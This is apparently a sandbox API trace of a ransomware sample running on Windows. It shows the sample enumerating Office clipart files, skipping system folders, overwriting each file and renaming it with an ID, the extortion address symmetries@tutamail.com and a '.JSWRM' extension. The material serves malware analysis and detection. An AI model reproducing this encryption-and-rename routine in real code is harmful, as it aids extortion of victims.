lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0095.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0095.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0095.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0095.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.541] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0095.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.542] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x283c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00183_.WMF", cAlternateFileName="")) returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2=".") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="..") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="...") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="windows") returned -1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="recovery") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="perflogs") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="documents and settings") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="system volume information") returned -1 [0095.542] lstrcmpiW (lpString1="SO00183_.WMF", lpString2="msocache") returned 1 [0095.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00183_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00183_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00183_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0095.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00183_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00183_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00183_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0095.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.543] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10300) returned 1 [0095.543] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2830) returned 0x24d210 [0095.544] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2830, lpOverlapped=0x0) returned 1 [0095.547] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.547] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2830, lpOverlapped=0x0) returned 1 [0095.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.547] CloseHandle (hObject=0x314) returned 1 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0095.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0095.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0095.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0095.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0095.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.548] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x514c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00190_.WMF", cAlternateFileName="")) returned 1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2=".") returned 1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="..") returned 1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="...") returned 1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="windows") returned -1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="recovery") returned 1 [0095.548] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="perflogs") returned 1 [0095.549] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="documents and settings") returned 1 [0095.549] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.549] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="system volume information") returned -1 [0095.549] lstrcmpiW (lpString1="SO00190_.WMF", lpString2="msocache") returned 1 [0095.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00190_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00190_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00190_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00190_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00190_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00190_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.549] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20812) returned 1 [0095.550] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5140) returned 0x24d210 [0095.550] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5140, lpOverlapped=0x0) returned 1 [0095.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.554] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5140, lpOverlapped=0x0) returned 1 [0095.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.554] CloseHandle (hObject=0x314) returned 1 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0095.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0095.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0095.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.555] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2090, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00191_.WMF", cAlternateFileName="")) returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2=".") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="..") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="...") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="windows") returned -1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="recovery") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="perflogs") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="documents and settings") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="system volume information") returned -1 [0095.555] lstrcmpiW (lpString1="SO00191_.WMF", lpString2="msocache") returned 1 [0095.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00191_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0095.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00191_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00191_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00191_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0095.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8336) returned 1 [0095.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2090) returned 0x205850 [0095.557] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2090, lpOverlapped=0x0) returned 1 [0095.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.561] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2090, lpOverlapped=0x0) returned 1 [0095.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.561] CloseHandle (hObject=0x314) returned 1 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0095.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0095.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0095.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00191_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00191_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.562] 